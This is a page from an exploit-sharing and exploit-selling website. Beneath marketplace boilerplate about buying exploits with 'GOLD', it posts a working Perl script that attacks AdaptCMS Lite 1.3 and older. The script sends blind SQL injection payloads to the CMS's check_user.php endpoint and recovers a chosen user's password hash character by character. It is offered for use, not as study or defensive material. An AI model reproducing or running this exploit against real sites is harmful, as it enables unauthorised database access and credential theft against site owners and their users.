0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit
================================================ AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit ================================================ #!/usr/bin/perl # ----------------------------------------------------- # AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit # Discovered By StAkeR # Discovered On 03/10/2008 # ----------------------------------------------------- # Download http://www.insanevisions.com/page/downloads # ----------------------------------------------------- use strict; use LWP::UserAgent; my ($hash,$send,$sub) = (undef,undef,1); my ($host,$uid) = @ARGV; usage() unless $host =~ /^http:\/\/(.+?)$/i and $uid =~ /^[0-9]$/; sub send_request { my $param = shift @_; my $http = new LWP::UserAgent; my $post = $http->post($host.'/includes/check_user.php',[ user_name => $param ]); if($post->is_success) { return 38 unless $post->content =~ /yes/i; } } my @chars = (48..57, 97..102); for(0..32) { foreach my $set(@chars) { $send = "' or ascii(substring((select password". " from adaptcms_users where id=$uid),$sub,1))=$set#"; if(send_request($send) > 1) { $hash .= chr($set); $sub++; last; } } } sub usage { print "[?] AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit\n"; print "[?] Usage: perl $0 http://[host] [user id]\n"; exit; } if(defined $hash) { print "[?] Hash: $hash\n"; exit; } else { print "[?] Exploit Failed!\n"; exit; } # 0day.today [2024-11-15] #